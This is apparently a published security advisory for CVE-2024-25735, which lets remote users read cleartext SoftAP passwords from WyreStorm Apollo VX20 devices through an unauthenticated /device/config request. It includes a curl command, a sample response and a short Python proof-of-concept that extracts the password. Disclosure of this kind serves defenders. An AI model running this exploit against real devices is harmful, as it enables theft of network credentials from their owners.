WyreStorm Apollo VX20 Credential Disclosure Vulnerability

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec     


[Vendor]
www.wyrestorm.com


[Product]
APOLLO VX20 < 1.3.58


[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)


[Affected Component]
Web interface, config


[Affected Product Code Base]
 APOLLO VX20 < 1.3.58, fixed in v1.3.58


[CVE Reference]
CVE-2024-25735


[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58.
Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
The credentials are then returned in the HTTP response. curl -k https://192.168.x.x/device/config

E.g. HTTP response snippet:

:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"}
,"softAp":{"password":"12345678","router":"y","softAp":"y"}...


[Exploit/POC]
import requests

target="https://x.x.x.x"
res = requests.get(target+"/device/config", verify=False)

idx=res.content.find('{"password":')
if idx != -1:
    idx2=res.content.find('router')
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + res.content[idx + 1:idx2 + 11])
        print("[+] hyp3rlinx")
else:
    print("[!] Apollo vX20 Device not vulnerable...")